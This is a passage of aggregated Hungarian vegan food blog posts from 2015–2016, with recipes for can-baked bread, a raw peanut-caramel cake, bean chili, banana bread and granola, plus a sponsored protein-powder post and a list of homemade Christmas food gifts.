veganizmus alapeszméjét. Az a jogi, filozófiai alapvetés és erkölcsi minimum, miszerint nem használunk (ki) állatokat önös érdekből, sem étkezés, sem szórakozás, sem öltözködés, sem kísérletek, sem bármilyen más célból.   Köszönöm az interjút!

Különleges konzervkenyér

2016. május 27. VegaLife 

Különleges konzervkenyérKülönleges a mérete és az íze miatt is. Mérete meglehetősen nagy, hiszen a sütőforma egy óriás-konzervdoboz volt, amiben előtte magozott fekete olívabogyók voltak. Készült is bőven olívás recept a korábbiakban (itt, itt, és itt olvasható), s még nem is írtam le mindegyiket. Nagyságának köszönhetően közel 2 kilós kenyér lett belőle. Emellett íze is különleges, a tészta egyik részébe őrölt fűszerpaprikát szórtam/­­gyúrtam, így készült el.  A recept Hozzávalók: - 3,5 dkg friss élesztő - 4,5 dl meleg víz - 30 dkg teljes kiőrlésű liszt - 45 dkg fehér liszt (BL-55) - 10 dkg őrölt zabpehely - 2-3 evőkanál olaj - 1,4 dkg só - piros fűszerpaprika (opcionális) - kókuszzsír   Elkészítés: Fogunk egy nagyobb tálat, az élesztőt belemorzsoljuk és felöntjük a kézmeleg vízzel. Várunk míg feloldódik az élesztő a vízben. Hozzászórjuk a liszteket, az őrölt zabpelyhet, a sót, s végül az olajat. Kezünkkel átgyúrjuk, átdagasztjuk. Ha úgy látjuk, hogy túlságosan ragacsos a tészta, folyton a kezünkhöz ragad, kevés lisztet szórunk rá. Ha viszont kemény, nehezen gyúrható a tészta, akkor kevés vízzel lazítjuk. Amikor úgy átdagasztottuk, hogy a tészta elválik az edény falától, akkor az edény alját, oldalát megszórjuk kevés liszttel, beletesszük a tésztát, a tetejére egy kevés lisztet szórunk és konyharuhával letakarva meleg helyen kb. 30 percet kelesztjük. Amikor kb. a duplájára kelt, egy részt leszakítunk belőle, amihez hozzászórjuk a paprikát, s újra átdagasztjuk vele, míg szép piros színe lesz a nyers tésztának.  A kimosott konzervet belülről kikenjük kókuszzsírral, megszórjuk kevés liszttel. A piros és fehér tésztát egymás mellé belehelyezzük a konzervbe, majd ismét letakarva kelesztjük, végül sütőbe tesszük, megsütjük kb. 30-40 perc alatt. Nagy mérete miatt a konzervből kiszedve tepsibe állítottam és még sütöttem rajta 5-10 percet, hogy a héja ropogósabb legyen. Kiszedésnél egy nagy késsel óvatosan körbejártam a konzerv falát, (fa)deszkára borítottam, majd egyszerűen kicsi ütögetésre kihuppant a kenyér. Miután visszatettük így a sütőbe, hogy a héja ropogósabb, szikkadtabb legyen, a sütés után jobb megvárni míg kihűl. Férjem a munkahelyére ebből készült szendvicseket vitt. Nézték, hogy milyen különleges félkör (ha a szeleteket félbevágjuk) és nagy kör alakú szendvicsei vannak. Ha nincs otthon ilyen nagy konzervünk, illetve nem tudnánk megenni ennyi babot/­­olívabogyót, nem probléma, kisebb konzervekkel is dolgozhatunk. Erről már írtam korábban: Rusztikus kalózkenyér vagy ha gluténmentesen szeretnénk: gluténmentes kalózkenyér. Ne felejtsük el, hogy egy ilyen kenyér szépen becsomagolva akár gasztro-ajándék is lehet.  

Nyers földimogyorós-karamelles-csokoládés torta (vegán)

2016. április 20. Zizi kalandjai 

Nyers földimogyorós-karamelles-csokoládés torta (vegán) Két hete volt I., vagyis apa születésnapja. Megbeszéltük Ádival, hogy készítünk meglepetéstortát apának. Előző nap pikk-pakk össze is dobtuk, mindent csak a robotgépben kellett darálni, aztán már mehetett is a fagyasztóba, mert nyers tortát készítettünk. Izgultam, hogy Ádi nehogy elkotyogja este apának, hogy a torta a mélyhűtőben van… ahogyan öcsém tette gyerekkorában, amikor apukám nagy születésnapi tortáját (januárban van a születésnapja) kiraktuk az erkélyre, hogy ne találja meg, ha hazaér. Persze öcsém mivel indított, amikor apukám belépett az ajtón: “Apa, torta az erkélyen!” Szerencsénkre apukám úgy értette, hogy tolltartó az erkélyen… nem tudta mit kezdjen az információval, anyukám meg csak legyintett, hogy nem érdekes. Így a torta titokban tudott maradni az átadásig, a tolltartó az erkélyen pedig családi legenda lett. Reméltem, hogy Ádi nem fogja elkiabálni magát és I. nem fog tolltartót keresni a mélyhűtőben. Másnap I. szülinapján volt még időnk kiengedni a tortát (szeletelhető állapotra), és fotózásra is maradt egy kis idő mielőtt hazaért. Égő gyertyákkal a torta tetején és énekkel vártuk apát. Jó tömény, tényleg vékony szelet elég belőle, ahogyan a nyers csokoládétortából is. Nekem legjobban a karamelles réteg jött be, ami datolyából készült rajta a földimogyoró szemekkel, majd a kesernyés csokoládé a tetején, ami készülhet nyers kakaóból vagy karobból is. Igazi csemege desszert, amire rájártunk esténként (is)! Próbáljátok ki! Három gyertya került rá, nem is tudom miért ennyi… /­­/­­ Közös gyertyafújás apával! Nyers földimogyorós-karamelles-csokoládés torta (vegán) Hozzávalók (18,5 cm-es csatos formához): Alaphoz: – 1 és 1/­­4 bögre (kb. 18 db) friss datolya, kimagozva (aszalt is jó, csak érdemes használat előtt egy fél órára langyos vízbe beáztatni, hogy könnyebben aprítsa a robotgép) – 1/­­2 bögre natúr nyers földimogyoró (sótlan) – 1/­­2 bögre mandula vagy dió – csipet Himalaya só Földimogyoróvajas karamelles réteghez: – 1 és 1/­­2 bögre (kb. 24 db) friss datolya, kimagozva – 1/­­2 bögre natúr földimogyoróvaj (sótlan, cukormentes) – 1 evőkanál datolyaszirup – csipet Himalaya só – natúr nyers földimogyoró (sótlan) Csokoládékrémhez: – 1/­­2 bögre kókuszolaj – 1/­­2 bögre nyers kakaópor vagy karobpor – 2 evőkanál natúr földimogyoróvaj – 2 evőkanál datolyaszirup – csipet Himalaya só Tegyük a késes aprítógépbe (robotgép) a mandulát és földimogyorót. Egy-két percig daráljuk, majd adjuk hozzá a datolyát és sót. Dolgoztassuk a gépet addig, amíg a torta alapunk összeáll tésztává. Ha nagyon száraznak érezzük, adjunk hozzá 1-2 teáskanál kókuszolajat. A tortaformát béleljük ki folpackkal vagy kenjük ki kókuszolajjal és nyomkodjuk az aljába a datolyás mandulás keveréket, majd tegyük a mélyhűtőbe megkeményedni, amíg elkészítjük a többi réteget. Tegyük az aprítógépbe a karamell réteg hozzávalóit, pépesítsük simára és kenjük rá az alap rétegre. Szórjuk rá a földimogyorószemeket, amelyeket enyhén nyomkodjunk bele a karamell rétegbe. Mehet újra vissza a mélyhűtőbe. Egy kis lábasban közepes láng felett olvasszuk meg a kókuszolajat a földimogyoróvajjal és datolyasziruppal. Keverjük hozzá a kakaóport és a sót. Ezt öntsük rá a tortára és tegyük vissza a mélyhűtőbe megkeményedni. Fogyasztás előtt kell neki legalább 1.5 óra, hogy szeletelhető állapotba kerüljön szobahőmérsékleten. ***** Láttátok már Mautner Zsófi újonnan megjelent #gasztrocsajok c. kiadványát (bookazine: book + magazine = könyvújság)?  Az a megtiszteltetés ért, hogy én is bekerülhettem azon 100 nő közé (egészséges amazonok kategóriában), akik szerepelnek benne és valamilyen formában a gasztronómia területén tevékenykednek. A bookazine-t megtaláljátok az újságárusoknál (3 hónapon keresztül) és a Libri könyvesboltokban. (Ár: 1490 Ft, Bookline-on is rendelhető, ott csak 1192 Ft.) Köszönöm a NON+-nak a csodaszép kék ruhát (a nyomtatásba kerülő fotón sajnos megváltozott kicsit a színe), amelyet biztosítottak számomra a fotózáshoz. A kép készültekor egyébként már óriási pocakom volt (Ákos nagyon gömbölyödött), de az előttünk lévő fehér vászon szinte mindent eltakart belőle!

Dupla babos Chili con veggie (glutén-, tojás-, laktózmentes, vegán), avagy van-e keresnivalója a konzervnek egy tudatosan táplálkozó konyhában?

2016. április 7. Zöld Avocado 

Dupla babos Chili con veggie (glutén-, tojás-, laktózmentes, vegán), avagy van-e keresnivalója a konzervnek egy tudatosan táplálkozó konyhában? dupla babos Chili con veggie (gluténmentes, tojásmentes, laktózmentes, vegán) Biztosan lesznek, akik most felhördülnek, amikor azt látják, hogy a konzervek és az egészségtudatos táplálkozás gondolatai egy mondatban szerepelnek. Minden tiszteletem azoké az embereké, akiknek mindig van idejük és kedvük megvárni a száraz hüvelyesek áztatási és főzési idejét, és soha nem nyúlnak egyszerűbb megoldásokhoz. Amikor csak tehetem én is a teljesen természetes alapanyagokat választom. De van, hogy ,,vétkezem. ;-) Ez a recept is egy így született. Fárasztó napok előzték meg, és gyorsan valami táplálót és fűszereset szerettem volna, amihez nem kell sok előkészület, és szinte magától elkészül.  Természetesen ez nem azt jelenti, hogy a legolcsóbb, rossz minőségű, tartósítószer és cukorral tömött konzerveket használtam. Gondosan megnéztem a címkéket, és a kifejezetten cukormentes, max.3 összetevős (víz, só, bab), lehetőleg bio konzerveket tettem a kosaramba. És igen, itt megint belém lehet kötni. Bio? Hahaha! Na persze! ;-) Tisztelettel jelentem én naív vagyok ezen a téren (is), és elhiszem, hogy a bio címke jobb minőséget takar, mint annak a hiánya. Persze nem tudhatom, hogy igaz-e, de próbálom úgy meghozni a döntéseimet, hogy ha én a tőlem telhető legtöbbet megtettem az adott ügy érdekében, akkor nyugodt lelkiismerettel fekszem le. A világ (jelen esetben az élelmiszergyártó) lehet hazug és csaló, az már nem az én lelkiismeretem.  Tehát megvettem a szerintem legjobb minőségű, legtudatosabban kiválasztott, egészséges konzerv alapanyagokat, és elkészítettem belőle ezt a rendkívül íz-gazdag és tápláló ételt. Egyszerű, villámgyors, és mindenki jól lakik vele. A tökéletes komplettálásnak köszönhetően pedig még egészséges is. (A rizsben kevés a lizin, a babban pedig alig van metionin, melyek közül mindkettő esszenciális. Amikor ezt a két tápanyagot egyszerre fogyasztod, teljes értékűvé komplettálod a fehérje tartalmukat.) dupla babos Chili con veggie (gluténmentes, tojásmentes, laktózmentes, vegán) vörösbab és fekete babÉs hogy miért dupla babos? Mert nem tudtam eldönteni, hogy vörösbabból vagy feketéből készüljön? Így mindkettő került bele! :-D  A babban lévő élelmi rost, a paradicsom, paprika és sárgarépa C-vitaminja, a paradicsom E-vitaminja, valamint a paprika B6-vitamin és folsavtartalma tisztítja a vérereket, ellenállóbbá teszi a szervezetet, és csökkenti a daganatos megbetegedések kockázatát.  Lelkiismeret furdalás nélkül ajánlom mindenkinek egy-egy zsúfolt vagy kedvetlen napra. Fogyasszátok sok szeretettel!  HOZZÁVALÓK (kb. 4 személyre) dupla babos Chili con veggie (vegán) - 1 db bio vörösbab /­­ vesebab konzerv (cukormentes) - 1 db bio feketebab konzerv (cukormentes) - 1 db bio csemegekukorica konzerv (cukormentes) - 1 db bio hámozott paradicsom konzerv (cukormentes) - 5-6 levél friss bazsalikom - Himalája só, fekete bors, 1 tk mustár  - 1 tk apróra vágott friss chili paprika - 1 közepes méretű vöröshagyma, 3 gerezd fokhagyma - 3 ek kókuszolaj vagy olívaolaj -  1/­­2 db zöld színű (kaliforniai) paprika - 1 ek balzsamecet - 1,5 bögre barna rizs - 3 bögre tiszta víz - tálaláshoz friss és ropogós salátalevelek (pl.: római saláta) és csíra - (elhagyható: 1 szál szárzeller) dupla babos Chili con veggie (gluténmentes, tojásmentes, laktózmentes, vegán) ELKÉSZÍTÉS A barna rizst a megszokott módon megfőzzük. Feltesszük dupla mennyiségű vízben fedővel lefedett edényben főni. Kb. 35 perc múlva elkészül.  Az apróra vágott vöröshagymát feltesszük az olajban dinsztelődni. Amikor már barnul, hozzáadjuk az apróra vágott fokhagymát és friss chili paprikát. 2-3 percig együtt sütjük őket folytonos kevergetés mellett. Majd hozzáadjuk a kukoricaszem méretűre vágott zöldpaprikát, sárgarépát és zellerszárat (elhagyható). Az egészet kb. 5 percig közepes lángon kevergetjük. Hozzáborítjuk a paradicsomkonzervet (levével együtt), a fűszereket, és a balzsam ecetet. Fedővel kb. 15 percig főzzük. Végül beleborítjuk a kétféle babkonzervet (levével együtt), a kukoricakonzervet (levével együtt) és hozzáadjuk az apróra vágott bazsalikomot. Mehet rá vissza a fedő, és még 10 percig főzzük közepes lángon. Ha nem elég erős, adjunk még hozzá őrölt chilit. Miután letelt a 10 perc ehetjük is.  Ha úgy érezzük, hogy túl sok leve van, vegyük le róla a fedőt, és minimum lángon főzzük további 5 percig fedő nélkül. (minimumra vegyük vissza a tűzhelyet, mert különben utána lehet konyhát takarítani, hogy eltüntessük a kipöfékelt paradicsomos szószt. ;-) ) Tálaljuk készre főtt barna rizzsel és friss salátával, csírával.  dupla babos Chili con veggie (gluténmentes, tojásmentes, laktózmentes, vegán) TÁPLÁLKOZZ, NE CSAK ÉTKEZZ! :-) Megjegyzés1: Természetesen száraz babból is el lehet készíteni az ételt. Ebben az esetben sokkal tovább tart, de még természetesebb lesz. Előző éjszakára áztassuk be a száraz babokat, majd főzzük meg őket külön-külön enyhén sós vízben. Utána pedig készítsük el az ételt a fenti recept szerint.  Megjegyzés2: Az aktív bélműködéstől sem kell megijedni a bab szó hallatán. Sokszor hallottam már kifogásnak a rostban gazdag ételekre, hogy inkább nem fogyasztják, mert gázosít. Ezért ne hagyjunk fel a fogyasztásukkal! A rostban gazdag ételek segítenek az emésztésben, aktívabbá teszik a bélműködést, ezáltal hatékonyabb a székletürítés. Ez pedig bármennyire is furán hangzik, jó dolog! A székletünk és a vizeletünk a test méregtelenítésének végeredménye. A hatékony méregtelenítés pedig egészségesebb testhez, tisztább belső szervekhez, több energiához és frissességhez vezet. Az antioxidánsban és rostban gazdag ételek (pl.: hüvelyesek is) rendszeres fogyasztása hozzájárul számos betegség megelőzéséhez és egészségünk megőrzéséhez. Inkább legyen több puki, mint magas vérnyomás, aranyér vagy akár szív és érrendszeri problémák!  dupla babos Chili con veggie (gluténmentes, tojásmentes, laktózmentes, vegán)

Cukormentes diós banánkenyér (vegán)

2016. március 24. Zizi kalandjai 

Cukormentes diós banánkenyér (vegán) Valaki kérdezte a minap, hogy hogyan tudok két gyerek mellett fotózni és blogolni. Hááááááát… két kézzel lavírozok az élet útvesztőjében, egyik karomon nyöszörgő baba, a másik kezemben fényképezőgép, a lábamon pedig csüng egy majdnem három éves. Ha ezt a képet elképzeltétek, remélem nevettetek egy jót. Alkalmanként van segítségem, ilyenkor több időt tudok szánni a fotózásra, kb. 10 percet. Ha nincs segítségem, akkor 2 perc marad a fotózásra, ilyenkor a csodaszép fotózási kellékeimet sem tudom elővenni… fotózok sima hétköznapi evőeszközzel, tányérral – amiben megesszük az ételt – és már esszük is az ebédet, hogy minél hamarabb végezzek, mielőtt felébred Ákos (ha éppen alszik). A habzsolás művészetét gyakorlom nagyon sok esetben, nincs idő elmélkedő rágcsálásra (pedig ez lenne az egészséges). A szoptatás miatt sokat eszem, így igyekszem minél gyorsabban és minél többet megenni, ez most a cél. Szóval én így csinálom: főzés, sütés, fotózás napközben, blogolás pedig éjszakába nyúlóan. Nem tudom, mások hogyan csinálják? Írjátok meg nekem! Tanuljunk egymástól! Régebben sütöttem ezt a banánkenyeret, mert kíváncsi voltam, hogy milyen lesz, ha tényleg mindenféle édesítő nélkül készítjük el. Ezen kenyér édes ízét csak a banánok és a frissen facsart narancslé adják. Nagyon édes szájúaknak egyáltalán nem lesz édes, aki a kevésbé édeshez van szokva, annak pedig édeskés lesz. Állagra és ízre is azonban puha és finom, kiváló tea, kávé mellé reggelire, uzsonnára vagy bármikor nassoláshoz. Mivel egyáltalán nincsen benne édesítőszer, ezért babáknak is jó egy-másfél éves kor után, akik már esznek diót, ami egyébként el is hagyható a kenyérből. Alaprecept innen, jó pár dolgot módosítottam rajta, többek között vegánosítottam. Még több banánkenyér: itt. Cukormentes diós banánkenyér (vegán) Hozzávalók: – 3 db érett banán, meghámozva, villával pépesre törve – 1/­­3 bögre frissen facsart narancslé – 3/­­4 bögre tönköly fehérliszt – 3/­­4 bögre teljeskiörlésű tönkölyliszt – 2 evőkanál lenmag – 6 evőkanál víz – 1 teáskanál szódabikarbóna – 1 teáskanál foszfátmentes sütőpor – 1/­­2 teáskanál őrölt fahéj – 1/­­2 bögre dió, felaprítva – 1 vaníliarúd kikapart magjai – 1 db narancs reszelt héja (opcionális) Egy kis tálkában keverjük össze a lenmagot a vízzel és hagyjuk állni 6-8 percig, amíg zselés állagú lesz (ez helyettesíti a tojást). Melegítsük elő a sütőt 180 fokra. Tegyük egy tálba a pépesre tört banánokat. Öntsük hozzá a  narancslevet. Adjuk hozzá a fahéjat, a vaníliát, a naracshéjat, a lenmagos vizet és jól keverjük el. Ezután adjuk hozzá a száraz hozzávalókat: tönköly fehérliszt, teljeskiörlésű tönkölyliszt, szódabikarbóna és sütőpor. Jól dolgozzuk össze a tésztát, majd tegyük bele az aprított diót. Ezzel is keverjük el. Az összekevert tésztát öntsük egy 25 cm hosszú szilikon püspökkenyér formába (ha nem szilikont használtok, béleljétek ki sütőpaprírral). Süssük az előmelegített sütőben kb. 40-45 percig (végezzünk fogpiszkáló próbát, hogy jól átsült-e a kenyér, akkor jó, ha a fogpiszkálóra már nem ragad semmi).

Myprotein - a vegánokért is :-)

2016. március 4. Mindennapi ételeink 

Myprotein - a vegánokért is :-) Nagyon sokan kérdezik tőlem, hogy vegánként mivel pótoljuk pl. az állati fehérjét,  B12 vitamint, mennyire biztonságos ez az életmód, mit eszünk egyáltalán. Plusz kérdés az is sokszor, hogy miért nem eszünk cukrot, illetve mit fogyasztunk helyette? Ezért gondoltam, írok egy bejegyzést minderről.  Napjainkat általában kásákkal indítjuk (növényi tejben megfőtt gabonák), ezt maximum szirupokkal édesítjük, eszünk hozzá mindig valamilyen olajos magot és sok-sok gyümölcsöt is. Fanni az olajos magot főképp mogyoróvaj, mandulavaj formájában eszi hozzá, vagy darált diót, napraforgómagot kap (ill. sokszor mákot is kér rá). Amennyiben nem kívánunk édeset, házilag sült (teljes őrlésű) kenyeret fogyasztunk, Fanni főképp melegszendvicsként szereti a kenyeret mostanában. Ehhez növényi pástétomot készítek (vagy szerzünk be vegán konzerv-pástétomot:-). Étkezéseink alapjai még sok esetben az olajos magvak (főképp mandula, dió, napraforgómag), ezekből növényi tejfölök készülnek. Emellett teljes értékű gabona (zab, köles, barna rizs) és kb. heti két, három alkalommal eszünk hüvelyeseket is (lencse, vöröslencse, csicseriborsó, bab, sárgaborsó stb.), fehérjepótlásra még szejtánt (búzahúst), ill. szóját, tofut használok a főétkezések során, ill. a tofuból pástétomokat is készítek.   Mindezek mellett szoktunk fehérje-shake-ket is itthon készíteni. A barnarizs fehérjét, és különböző egészségünkhöz fontos alapanyagokat, készítményeket a Myprotein-től szoktuk rendelni.  Most ráadásul ajándékcsomagot kaptunk tőlük, amit le is fotóztunk, hogy bemutassuk a termékeket.  A cég rendkívül sok vegán proteint (=fehérjét) forgalmaz, aki nem szereti a szóját, az is találhat magának borsófehérjét, kendermag fehérjét, ún. vegan blend-et (kombinált borsó, barna rizs, kendermag fehérjét), illetve barna rizs fehérjét, mi ez utbbit szoktuk fogyasztani. Az ízesítetlen fehérjék nem mindenkinek elég ízletesek, így mi a fehérjeport általában banánnal, datolyával/­­mazsolával, mandulavajjal/­­mogyoróvajjal/­­kesudióvajjal és növényi tejjel turmixoljuk össze.  A magokból készült vajakat is innen szoktuk rendelni, amennyiben nem otthon készítem el azokat. Kesudióvajat, mandulavajat is rendelhetünk náluk, de pl. fehérjével dúsított mogyoróvajat is forgalmaznak.  Mi a napi vitaminunkat, illetve B12 vitamint is itt szerezzük be. Férjem vitaminja (amelyet én is szedtem a betegségem abban a fázisában, amikor nagyon gyenge voltam, szédültem, ájultam) is innen kerül hozzánk.  Én emellett iszom még elég gyakran a 22 "szuperételt" tartalmazó porból is (pl, spirulina, gingko biloba, spenót, fekete áfonya, búzafű stb.). Cukor helyett nyírfacukrot, eritritet, szteviát és szirupokat használunk. A cégnél számos termék szteviával ízesített, illetve szirupokat is kaphatunk náluk.  Sokan felvetik, hogy milyen drága dolog vegánként élni. Szerintem egyrészt a húsok ára sem olyan alacsony, illetve ha belegondolunk, hogy nem veszünk cukrot, kekszet, csokit, gyümölcsjoghurtokat, bolti pékárut, lekvárt, akkor láthatjuk, hogy nagyon sokat spórolunk, és ezeket az összegeket egészséges ételek megvételébe fektethetjük. Nem beszélve arról, hogy nem is tudom, mikor voltunk utoljára igazán betegek (na jó, én most az voltam, vagyok /­­ gyógyulok, de ez nem az életmódból adódóan, sőt, annak is köszönhető az életem). Fanninak volt három pár hónap, amikor az anyatejet elhagytuk Fanninál (kb. 1.5 éves korában), hogy több mindent elkapott, de se előtte, se utána nem volt beteg.  Így ajánljuk azt is, hogy húsvétra ne csokit vagy hasonló dolgokat, hanem egészséges termékeket ajándékozzunk.

Citromos fügelekvárral vagy anélkül...

2016. január 6. Zöld múzsa 

Citromos fügelekvárral vagy anélkül...Egy írás szerint: ,,Az amerikaiak a zabpelyhet úgy eszik, hogy megfőzik előbb, vagy sütőben megpirítják. Nocsak, ezek az amcsik tudnak valamit, nem eszik a gabonát nyersen! A főtt változat egyszerű magyar kifejezéssel illetve nem más, mint a zabkása. A boltok polcán lévő (hőkezelés nélküli ) müzlik helyett pedig bátran fogjunk bele a crunchy granola, magyarul  ropogós müzli készítésébe. Kis mennyiséggel nem érdemes bajlódni, a sült müzli légmentes üvegekben 1-2 hétig eláll, bár a szavatossági időt otthoni körülmények között még nem sikerült tesztelnem, a gyerekek mindig hamarabb megették a lesütött adagot.  Banános granola: 250 g zabpehely 80 g durvára vágott mandula 80 g tökmag, napraforgó 2 nagyon érett banán 3 ek. kókuszolaj 2 ek. méz vagy juharszirup 1/­­2 tk. vanília őrlemény csipet só ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Béleljünk ki egy tepsit sütőpapírral és melegítsük elő a sütőt 175 fokra. Egy nagy tálba keverjük össze a száraz hozzávalókat, míg egy kisebb edénybe a folyékonyakat. A kezünkkel alaposan dolgozzuk össze a száraz és a nedves hozzávalókat. A banánt villával pürésítsük és azt is keverjük hozzá a masszához, majd egyenletes rétegben terítsük el a sütőlemezen. Süssük 15-20 percig, de félidőkor keverjük át egyszer. Folyamatosan ellenőrizzük, mert a méz miatt könnyen megéghet. Hagyjuk teljesen kihűlni és csak ezután tegyük légmentesen zárható üvegbe. Aszalványokkal dúsíthatjuk ( pl. mazsola, aszaltáfonya, aszaltmeggy, aszaltananász, stb ). Csokirajongók durvára vágott csokidarabokat is tehetnek a keverékbe. Ráérős reggeleken királyi módon tálalhatjuk a granolát.  Ehhez egy szuperfoodnak felcimkézett élelmiszert ajánlok, a chia magot: nagy erőt egy piciny magban. Az ára senkit ne riasszon vissza, cirka 100 Ft-ba kerül napi egy evőkanálnyi adag, amiről azt kell tudni, hogy teljes értékű fehérjeforrás, kitűnő rostforrás, tele van kalciummal és ötszörös mennyiségű vas van benne, mint a spenótban. Az ételek ízét nem befolyásolja, teljesen semleges ízű. Ár-érték aránya magasan a péksütemények felett áll. Chia puding: 250 ml tej ( opcionálisan zab-,rizs- vagy mandulatejet ) 4 ek. chia mag 1/­­2 citrom héja ( bio) Meleg alma-mag keverék: 1-2 ek. vaj vagy kókuszolaj 1-2 ek. méz vagy juharszirup 1 nagy alma 50 g napraforgó, 50 g tökmag, 50 g szezámmag 1/­­2 tk. fahéj csipet őrölt gyömbér csipet só --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- A chia puding hozzávalóit alaposan összekeverjük és hagyjuk állni a hűtőben, hogy a magok megduzzadjanak. A meleg almás keveréket egy teflonos serpenyőben készítjük el. Felolvasztjuk a zsiradékot és rádobjuk az apró kockákra vágott almát a magokkal és a fűszerekkel. 5 percig pároljuk, míg az alma kicsit karamellizálódik, a magok pedig ropogóssá válnak. Ezek után jöhet a rétegezés poharakba. Alulra egy kanál chia puding ( koncentrált erő ), majd néhány kanál natúr joghurt. Mindezek tetejébe az előre elkészített granola, majd a meleg alma-mag keverék. Ha a kamra polcán találunk dugiban lekvárkülönlegességet, azt is vegyük elő. Mondjuk egy cukormentes citromos füge lekvárhoz mit szóltok? Januárban mi így indítottuk az évet. Mit is kívánhatnék ennél többet: chia magban és granolában gazdagot! Tipp: kisebb, zárható üvegben rétegezve magunkkal vihetjük, szorgos munkanapok tízóraijának kitűnő, csak a kanalat ne feledjük otthon.  forrás: green kitchen stories

Mit adjak karácsonyra?

2015. december 12. VegaLife 

Mit adjak karácsonyra?Teszik fel sokan a címben szereplő kérdést. Napjainkban az ajándékozás egyre inkább a pénzről szól (persze vannak kivételek). Vajon egyénenként hány órát töltünk azzal, hogy üzleteket járunk, keresve a legmegfelelőbb ajándékot. Miért ne készíthetnénk mi, a saját kezünkkel (gasztro-) ajándékot, ha csak lehet?  Blogomról összegyűjtök néhány ötletet (10 alaprecept) ami segíthet az elindulásban, a további ötletelésben, hiszen senkinek nem szükséges ragaszkodnia az adott recepthez, attól el is térhet. Gyorsan, pár perc alatt elkészíthető ajándékokat és hosszasabb készületet igénylő meglepetéseket is bemutatok. Címükre vagy a képre kattintva az eredeti recepthez jutsz.   Aszalt paradicsom fűszeres olajban Csempészd az olaszok napsütötte Toszkánját a fa alá a következő ajándékkal, amihez nem kell sok minden, de jó minőségű alapanyagokkal olaszos ételek ízvilágát idézheted fel. Tipp: Ha kiváló minőségű olíva olajjal készíted, és nem fele-fele napraforgó olajjal, akkor még finomabb lesz. A babérlevelet is kihagyhatod. A kakukkfű helyett használhatsz bazsalikomot és/­­vagy oreganót. ?   Csilis olaj Nem feltétlen gasztronómiai céllal ajánlom, úgy veszélyes lehet. Ellenben  reumás panaszokat enyhíthet. Persze nem belsőleg fogyasztva. Ha mégis ételhez kevernénk, mindig csak csepegtessük a levesbe/­­szószba. Tipp: Felmelegített méhviasszal, vagy kenhető állapotú kókuszzsírral a csilis olajjal és néhány csepp illóolajjal - pl. fahéj, narancs - összekeverve masszázskrémet kapunk, amivel a fájdalmas területet rendszeres alkalmanként bemasszírozva enyhülést érhetünk el. Ha masszázsra adjuk ajándékba, adjunk hozzá egy üveg ásványvizet is, így biztos nem felejti el az ajándékozott, hogy masszázs előtt és után bőséges vízfogyasztás szükséges a megfelelő hatás elérésére. ?   Fűszeres olaj Fűszereket szabadon válogatva készítheted el ezt az ajándékot. Legtöbb háziasszony bizonyára használni tudja, legyen vegán, vegetáriánus, paleo, gluténmentes, vagy mindenevő. Pirítós kenyeret különlegesen megízesíti, ha fűszeres olajjal kenjük meg (vaj vagy margarin helyett). Persze főtt krumplit is meglocsolhatunk vele, de salátáknak is finom ízt adhat attól függően, hogy milyen fűszereket választunk. Tipp: Ajándékozás előtt néhány nappal érdemes elkészíteni, de ha időnk csak úgy engedi, az utolsó pillanatban is gyorsan készen leszünk vele, ha van otthon fűszerünk - friss fűszerek előnyben. ?   Ételízesítő házilag A legtöbb háztartásban nem is nézik meg, hogy mi mindent tartalmaz a Vegeta vagy a Delikát. Pedig nem árt szembenézni a ténnyel, hogy az átlag-emberek mennyi mérget visznek be akár általuk is a szervezetükbe. Tipp: Mi is készíthetünk ételízesítőt, s ha önmagunk nem tudunk zöldségeket aszalni és aprítani hozzá, bioboltokban, Herbaházban biztos találunk szárított zöldségeket. Ehhez már csak kurkuma, só és persze egy jó aprító, vagy kávédaráló és egy csinosabb üveg szükséges.  ?   Mandarin lekvár Decemberben már elég jól lemegy a mandarin ára ahhoz, hogy elkészítsük, néhány kilónyi mandarin ugyanis szükséges hozzá. Készüljünk fel rá, hogy enyhén fanyar íze van, főleg melegen. Viszont egy reggeli pirítósra kenve királyoknak járó ízekben lehet része mindannak, aki kóstolja. :) Tipp: Hűtve a legfinomabb, ezért érdemes időben elkészíteni és hideg helyen, pl. hűtőben vagy pincében tárolni.  ?   Rusztikus kalózkenyér Eddig akárhányszor készítettem el ajándékba, mindig nagy sikere volt. Kenyérre ugyanis mindig szükség van, sőt, ha tele van aprított magvakkal, akkor különösen gyorsan elfogy. Elkészíthetjük gluténmentesen is, ha úgy alkalmas. Tipp: A kenyér törzse köré karácsonyi hangulatú szalvétát vagy csomagolópapírt tekerve még dekoratívabb az ajándékunk. ?      Kókuszgolyó Határozottan egészségesebb, nincs köze se kávéhoz, se darált-kekszhez, viszont sok-sok aszalt gyümölcsöt tartalmaz, ezért aztán egy igazi energia-bomba. További bon-bon-mánia esetén találsz még a blogon néhány ötletet:  Nyers energia-bonbon Szív alakú aszalt gyümölcsös bonbon csokiborítással Tejberizzsel töltött ostyagolyó   Tipp: Szép kis dobozba, bon-bon papírba helyezve nem csak a szájnak, de a szemnek is kellemes élmény lesz! :)  ?   Kelt kakaós-csíkos kalács Egy csinos kis kalács kenyérformában vagy koszorú/­­kuglóf formában megsütve mutatós finomság. Nagyszüleink idejében, mikor én még igazán kis unoka voltam, a karácsonyfára elsősorban "ezüst"papírba burkolt diót, almát tettek a fára. A fa alá kerülhetett a finom kelt kalács, vagy folyós kakaóval, mákkal töltve, vagy kakaós-fehér tésztával felcsavarva. Tipp: Ha koszorúformában sütöd meg, közepébe egy piros almát tehetsz, az egészet pedig masnival átkötve tetszetős ajándékot tudsz átadni.   ?       Téli fagyi Kicsit macerás elkészíteni, mivel időigényesebb, de nem annyira nehéz. Kedvünkre variálhatjuk, hogy mogyorós, kókuszos külsőt adjunk a "gombócoknak". Ez nem az a téli fagyi, aminek lágy, folyósabb a belseje. Tipp: Dekoratívabb lesz az ajándék, ha egy szép külsejű dobozba csomagoljuk. Ha egymásra többet tennénk, zsírpapírral vagy színes kartonpapírral elválaszthatjuk a szinteket.   ?     Élesztő- és gluténmentes pogácsa Az utolsó, 10. gasztro-ajándék receptem pedig a sós ízeket kedvelők számára kedvez. Mivel gluténmentes, élesztőmentes, hiszen gondolnunk kell azokra is, akik diétára kényszerülnek karácsonykor is, vagy eleve állandó helyzetükből adódóan nem fogyaszthatnak pl. glutént. Tipp: Átlátszó zacsiba vagy organzából készített kis zsákocskába is teheted, tetejét egy színes szalaggal átkötve.  

A datolya hatásai

2015. december 10. Élj harmóniában 

